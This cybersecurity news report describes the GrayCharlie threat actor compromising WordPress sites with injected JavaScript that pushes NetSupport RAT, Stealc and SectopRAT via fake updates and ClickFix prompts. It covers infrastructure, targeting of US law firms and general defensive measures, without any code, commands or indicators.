GrayCharlie Injects Malicious JavaScript into WordPress Sites to Deliver NetSupport RAT and Stealc

23 February 2026

A threat actor known as GrayCharlie has been compromising WordPress websites since mid-2023, silently embedding malicious JavaScript to push malware onto visiting users.

The group overlaps with the previously tracked SmartApeSG cluster, also called ZPHP or HANEMONEY. Its main tool is NetSupport RAT, a remote access trojan that gives attackers direct control over infected machines.

Beyond NetSupport RAT, the group has also deployed Stealc, an information-stealing malware, and more recently SectopRAT, broadening the scope of what attackers can steal from compromised systems.

GrayCharlie’s core technique involves inserting a script tag into the Document Object Model (DOM) of a legitimate but compromised WordPress site.

The tag points to an external JavaScript file hosted on attacker-controlled servers. When a visitor opens the page, the script profiles their browser and operating system before deciding what to show them next.

Victims are presented with either a convincing fake browser update or a ClickFix-style fake CAPTCHA — both designed to get users to install or execute the malware themselves without realizing it.

Recorded Future analysts identified GrayCharlie’s backend infrastructure as tied primarily to MivoCloud and HZ Hosting Ltd.

The researchers tracked two main clusters of NetSupport RAT C2 servers, each defined by distinct TLS certificate naming patterns, license keys, and serial numbers — deployed steadily throughout 2025.

Overview of GrayCharlie clusters observed in 2025 (Source - Elastic) — Overview of GrayCharlie clusters observed in 2025 (Source – Elastic)

The group administers C2 servers over TCP port 443 and uses SSH to manage staging servers, helping its traffic appear normal. Browsing patterns from higher-tier infrastructure suggest at least some members of GrayCharlie are Russian-speaking.

Website impersonating 'Wiser University' (Source - Elastic) — Website impersonating ‘Wiser University’ (Source – Elastic)

The group’s attacks span many industries globally, though the United States remains its most frequent target. At least fifteen US law firm websites were found injected with identical malicious JavaScript pointing to the same attacker domain.

Website impersonating 'Activitar' (Source - Elastic) — Website impersonating ‘Activitar’ (Source – Elastic)

Researchers believe these law firms were compromised through a supply-chain attack involving SMB Team, an IT services company serving numerous law firms across North America.

Website of Gerling Law Injury Attorneys (top) and SMBTeam logo (bottom) (Source – Elastic)

Stolen credentials tied to an SMB Team email address surfaced around the time the malicious domain first became active.

How GrayCharlie Infects Systems

Once a victim runs the fake update JavaScript, WScript spawns PowerShell, which downloads and extracts a full NetSupport RAT client into the user’s AppData folder.

Attack Chain 1 (Source - Elastic) — Attack Chain 1 (Source – Elastic)

The ClickFix chain works similarly — the user pastes an attacker-planted command that retrieves a batch file, installs the RAT, and writes a Registry Run key for persistence on every reboot.

Attack Chain 2 (Source - Elastic) — Attack Chain 2 (Source – Elastic)

Operators connect via C2, run system reconnaissance, and can drop SectopRAT as a secondary payload.

To reduce exposure, security teams should block known GrayCharlie IP addresses and domains, deploy YARA, Snort, and Sigma detection rules in SIEM or EDR platforms, and monitor WordPress sites for unauthorized DOM script injections.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post GrayCharlie Injects Malicious JavaScript into WordPress Sites to Deliver NetSupport RAT and Stealc appeared first on Cyber Security News.

>>More